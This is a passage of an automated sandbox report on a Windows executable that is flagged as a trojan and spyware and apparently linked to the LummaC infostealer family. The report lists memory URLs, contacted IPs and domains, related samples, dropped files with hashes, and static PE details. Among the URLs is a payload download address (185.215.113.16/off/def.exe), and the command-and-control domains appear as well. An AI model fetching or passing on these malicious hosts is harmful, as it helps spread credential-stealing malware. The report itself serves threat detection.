2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404451499.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511687623.0000000001542000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	2oM46LNCOo.exe, 00000002.00000003.1574302041.0000000001583000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890837215.00000000062E9000.00000002.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574118043.0000000005D70000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574082227.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511665760.0000000001572000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452041940.0000000001571000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.cookielaw.org/	2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.199.72	observerfry.lat	United States	13335	CLOUDFLARENETUS	false
52.217.14.36	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
185.166.143.50	bitbucket.org	Germany	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580293
Start date and time:	2024-12-24 08:52:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2oM46LNCOo.exe renamed because original name is a hash value
Original Sample Name:	3a5f8e977a1a8b210f718f433b8488c3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 20.109.210.53, 20.190.147.10
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 2oM46LNCOo.exe, PID 7284 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:53:46	API Interceptor	21x Sleep call for process: 2oM46LNCOo.exe modified
04:33:50	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.199.72	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	yO9EAqDV15.exe	Get hash	malicious	LummaC	Browse
	Collapse.exe	Get hash	malicious	LummaC	Browse
	ZysXVT72cl.exe	Get hash	malicious	LummaC	Browse
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse
185.166.143.50	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	V7giEUv6Ee.bat	Get hash	malicious	Unknown	Browse
	GdGXG0bnxH.exe	Get hash	malicious	Unknown	Browse
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-w.us-east-1.amazonaws.com	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	16.15.177.52
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	3.5.17.0
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	54.231.128.9
	http://plnbl.io/review/FSUQBEfTfzwH	Get hash	malicious	Unknown	Browse	54.231.128.17
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	3.5.27.149
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	3.5.29.203
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	52.217.75.84
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	3.5.25.145
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	3.5.29.153
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	3.5.25.82
observerfry.lat	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.199.72
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	yO9EAqDV15.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	Collapse.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	ZysXVT72cl.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
bitbucket.org	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.166.143.48
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	185.166.143.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	172.67.209.202
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.199.72
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	yO9EAqDV15.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.37.173
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
AMAZON-02US	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	armv5l.elf	Get hash	malicious	Unknown	Browse	35.163.11.216
	splm68k.elf	Get hash	malicious	Unknown	Browse	3.138.165.134
	nklarm7.elf	Get hash	malicious	Unknown	Browse	3.115.112.216
	splarm7.elf	Get hash	malicious	Unknown	Browse	3.116.167.193
	nklarm5.elf	Get hash	malicious	Unknown	Browse	18.183.83.81
AMAZON-02US	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	armv5l.elf	Get hash	malicious	Unknown	Browse	35.163.11.216
	splm68k.elf	Get hash	malicious	Unknown	Browse	3.138.165.134
	nklarm7.elf	Get hash	malicious	Unknown	Browse	3.115.112.216
	splarm7.elf	Get hash	malicious	Unknown	Browse	3.116.167.193
	nklarm5.elf	Get hash	malicious	Unknown	Browse	18.183.83.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	yO9EAqDV15.exe	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	52.217.14.36 185.166.143.50 172.67.199.72
	eMBO6wS1b5.exe	Get hash	malicious	LummaC Stealer	Browse	52.217.14.36 185.166.143.50 172.67.199.72

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2oM46LNCOo.exe_a0d3a3bcbb4533416ba9efa1708b863091765035_fd41d432_5db8c4fd-1f17-4fcc-9a5e-a2f8a7545430\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0439248875800602
Encrypted:	false
SSDEEP:	96:viFuvquXhlsvehYoI7JfGQXIDcQvc6QcEVcw3cE/9HIH4+HbHg/8BRTf3Oy1oVaE:akllC0BU/IjudxhYfzuiFbZ24IO8aI
MD5:	EF0B8ED4BC9F536F02A7E58FE7DA2094
SHA1:	2C3D02BDA7D905DC308F130AC17912213ECAD3F5
SHA-256:	5370F871C984921E58EEBC5818DC089982765A4DB91B7BC72F8EFABB77A9F806
SHA-512:	FD99274ED3C15F01B38FC349AF493FB08367A4B6871B33AC86C5186881ADCAD683B38E8701ED94559554CA7E3BFDFE44434697DB02B8B794E15BAF321F491C1A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.6.4.0.1.8.6.2.3.5.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.6.4.0.2.3.6.2.3.6.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.b.8.c.4.f.d.-.1.f.1.7.-.4.f.c.c.-.9.a.5.e.-.a.2.f.8.a.7.5.4.5.4.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.4.6.9.9.7.8.-.6.5.7.9.-.4.6.8.7.-.9.5.a.9.-.8.3.8.6.5.6.8.4.0.b.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.o.M.4.6.L.N.C.O.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.4.-.0.0.0.1.-.0.0.1.4.-.1.e.d.5.-.d.b.f.3.d.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.e.e.1.9.3.5.1.3.3.a.2.d.7.2.4.0.7.e.8.9.c.8.d.0.3.6.2.9.3.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.0.0.c.5.b.6.1.b.3.7.e.d.d.1.a.8.e.5.b.8.d.8.1.3.4.0.8.3.2.b.f.0.5.0.9.3.5.1.c.!.2.o.M.4.6.L.N.C.O.o...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER27A8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 24 09:33:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	282786
Entropy (8bit):	1.5413539194764714
Encrypted:	false
SSDEEP:	1536:OJ89aWAFjBCEamPYWiUKXe9yHu7gFAiO/:OGaW+FCEamAtUKXe9yHu7gFE/
MD5:	2B2C691D24EF154DC77751DDCB280FFE
SHA1:	4901F401E8388CAF97ED4988B9407D4527B40D4E
SHA-256:	F8FD971CB7B86C99D03DA249E214E715275589E60357366441F742E44A778CB2
SHA-512:	462F8181DA1FF0E516117ACA0598214FF8D5E40A65C5C09505487B1FE5E0A5DD3088CCC07AA7DDBE1FD188B116EC6EFCA49F10F6FE0EE92E26EBA0F6352142AC
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........jg....................................D....'..........L...........`.......8...........T............L...............(...........*..............................................................................eJ......`+......GenuineIntel............T.......t....hjg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER28E1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.7029633631749523
Encrypted:	false
SSDEEP:	192:R6l7wVeJjV6a6YN9SUugmf+cLnprC89b6vsfVa+m:R6lXJx6a6Y3SUugmf+m6UfE
MD5:	3D412A8A831E3C762A0E482E5D2DDFA4
SHA1:	E057E01D883C902B40B3C9DD423AA08AC9AC8066
SHA-256:	6E5BB4C804A7347BBA78F9D25FE600F959F0A59E5C674CDC7FD5EF5A726B207C
SHA-512:	4F6BEF016BED2AB8589DC814B9A64F5190557EE114ABF50D683F3B8BAC4C2EFFE22104F09D0EE2E57399865B27B2FBA72A0583F90B77A4CFCA450FA2B7038309
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2911.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4624
Entropy (8bit):	4.509312313843469
Encrypted:	false
SSDEEP:	48:cvIwWl8zsVJg77aI9eJWpW8VY7Ym8M4J+KbLxFcpo+q8lv9hzHzxzId:uIjfvI7847VLJ+Kb8pouvPzHzxzId
MD5:	5E9EA130DDA283290317CE6BE59082A1
SHA1:	C8EF01B406FF680A0E8F89F64B876E894D627BB2
SHA-256:	B493FB0920DA57C965845C355439D04596A90F863EBFC056B28D80E7D5A9DDDE
SHA-512:	DC6E02E84AFE30F43B7D048F82B463B5A1EA4D67DD7C88DCC778A299F8B56DDB2074738FBF929930C4116E4BAB6A35B0616A9C8EC5568AEED98E2F4C39237295
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645156" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.41666442454391
Encrypted:	false
SSDEEP:	6144:Ccifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+S:vi58oSWIZBk2MM6AFBUoS
MD5:	8B64C1203C9E6CF945233DB72F7AEE65
SHA1:	6770F20FE9AADEED35F0EDDE0BC0646496346D0F
SHA-256:	ECAAEA9F24F67075287ED89268CBA70F9588D0165D1E8397C14822D173B5DBCA
SHA-512:	AE18DB3E55EDD5F60C8D15E7395B7AF1272D465ACE16A29199354BF9478A11E55B21FB1ADA79FCBFBA31DB2C246C6773568EB2AE65D501A0C44497B2EF98732F
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj.w..U..............................................................................................................................................................................................................................................................................................................................................*-`.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.502686451771036
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2oM46LNCOo.exe
File size:	2'965'504 bytes
MD5:	3a5f8e977a1a8b210f718f433b8488c3
SHA1:	900c5b61b37edd1a8e5b8d81340832bf0509351c
SHA256:	7eb2fc825498602af9acfc984eccaafc0a86207ce6711b9515430e184538a646
SHA512:	c4d3797ba5abf3ec606ae1bcdbb66a2c564d938401cf661fd300d26e45febec41afeec6d4ea133f49b36c86a31a230efe363869399794cd1143d74737eb56d84
SSDEEP:	49152:rHCl4T1FTDbf9syNkQMHOKTvS9AVsInng0xRtC:rHCS1FTDbf9syNkQMHrpSyngSRtC
TLSH:	B4D53BD1AD0AB1CBD48A17B88477CE82797D07BD8B2045C3986C687A7E67DC211F6C39
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@..........................@0.....R.-...@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x701000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

